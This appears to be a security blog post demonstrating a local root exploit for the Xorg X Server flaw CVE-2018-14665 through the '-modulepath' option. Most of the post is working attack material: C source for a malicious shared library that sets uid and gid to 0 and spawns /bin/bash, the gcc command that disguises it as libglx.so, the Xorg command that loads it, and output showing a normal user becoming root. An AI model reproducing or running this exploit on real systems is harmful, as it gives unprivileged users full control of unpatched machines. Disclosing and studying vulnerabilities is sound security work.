Software [In]Security

CVE-2018-14665: Another way of exploitation using '-modulepath'

Credit - RedHat Product Security Team discovered this issue.

There is lot of discussion going about CVE-2018-14665 exploitation using -logfile but second vulnerable option “modulepath” is almost ignored.

CVE-2018-14665 can be exploited in another way using “-modulepath” option which allows user to load and execute malicious code as root !!

Exploitation

Collect Xorg X Server loaded modules information

Xorg X Server loads various modules during startup. For this demo we will be using -

libglx.so

  [  5549.223] (II) LoadModule: "glx"
  [  5549.223] (II) Loading /usr/lib/xorg/modules/extensions/libglx.so
  [  5549.224] (II) Module glx: vendor="X.Org Foundation

Create small shell module 

Shell.c

  #include <stdio.h>
  #include <sys/types.h>
  #include <stdlib.h>
  void _init() {
  setgid(0);
  setuid(0);
  system("/bin/bash");
  }
  [developer@centos-x86 xorg-demo]$ gcc -fPIC -shared -o libglx.so shell.c -nostartfiles
  [developer@centos-x86 xorg-demo]$ 
  [developer@centos-x86 xorg-demo]$ ls -la
  total 16
  drwxrwxr-x.  2 developer developer   38 Oct 26 22:14 .
  drwx------. 26 developer developer 4096 Oct 26 22:02 ..
  -rwxrwxr-x.  1 developer developer 5772 Oct 26 22:14 libglx.so
  -rw-rw-r--.  1 developer developer  147 Oct 26 22:03 shell.c
  [developer@centos-x86 xorg-demo]$ 
  [developer@centos-x86 xorg-demo]$


Load our malicious shell module

  [developer@centos-x86 ~]$ 
  [developer@centos-x86 ~]$ id
  uid=1000(developer) gid=1000(developer) groups=1000(developer) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
  [developer@centos-x86 ~]$ 
  [developer@centos-x86 ~]$ Xorg -modulepath ',/home/developer/xorg-demo' :2 
  
  X.Org X Server 1.19.5
  Release Date: 2017-10-12
  X Protocol Version 11, Revision 0
  Build Operating System:  3.10.0-693.17.1.el7.x86_64 
  Current Operating System: Linux centos-x86.localdomain 3.10.0-862.14.4.el7.centos.plus.i686 #1 SMP Fri Sep 28 05:30:57 UTC 2018 i686
  Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-862.14.4.el7.centos.plus.i686 root=/dev/mapper/centos-root ro crashkernel=auto rd.lvm.lv=centos/root rd.lvm.lv=centos/swap rhgb quiet LANG=en_US.UTF-8
  Build Date: 11 April 2018  04:44:33PM
  Build ID: xorg-x11-server 1.19.5-5.el7 
  Current version of pixman: 0.34.0
   Before reporting problems, check http://wiki.x.org
   to make sure that you have the latest version.
  Markers: (--) probed, (**) from config file, (==) default setting,
   (++) from command line, (!!) notice, (II) informational,
   (WW) warning, (EE) error, (NI) not implemented, (??) unknown.
  (==) Log file: "/var/log/Xorg.2.log", Time: Fri Oct 26 22:15:12 2018
  (==) Using config directory: "/etc/X11/xorg.conf.d"
  (==) Using system config directory "/usr/share/X11/xorg.conf.d"
  'abrt-cli status' timed out


wait for few seconds and you will be dropped into root shell!

  [root@centos-x86 ~]# 
  [root@centos-x86 ~]# 
  [root@centos-x86 ~]# id
  uid=0(root) gid=0(root) groups=0(root),1000(developer) context=unconfined_u:unconfined_r:xserver_t:s0-s0:c0.c1023
  [root@centos-x86 ~]# 
Module loader logs :
  [  6683.669] (++) ModulePath set to ",/home/developer/xorg-demo"
  [  6683.669] (II) The server relies on udev to provide the list of input devices.
          If no devices become available, reconfigure udev or disable AutoAddDevices.
  [  6683.669] (II) Loader magic: 0x6f5020
  [  6683.669] (II) Module ABI versions:
  [  6683.669]    X.Org ANSI C Emulation: 0.4
  [  6683.669]    X.Org Video Driver: 23.0
  [  6683.669]    X.Org XInput driver : 24.1
  [  6683.669]    X.Org Server Extension : 10.0
  [  6683.678] (--) PCI:*(0:0:2:0) 80ee:beef:0000:0000 rev 0, Mem @ 0xe0000000/33554432, BIOS @ 0x????????/131072
  [  6683.678] (II) LoadModule: "glx"
  [  6683.678] (II) Loading /home/developer/xorg-demo/libglx.so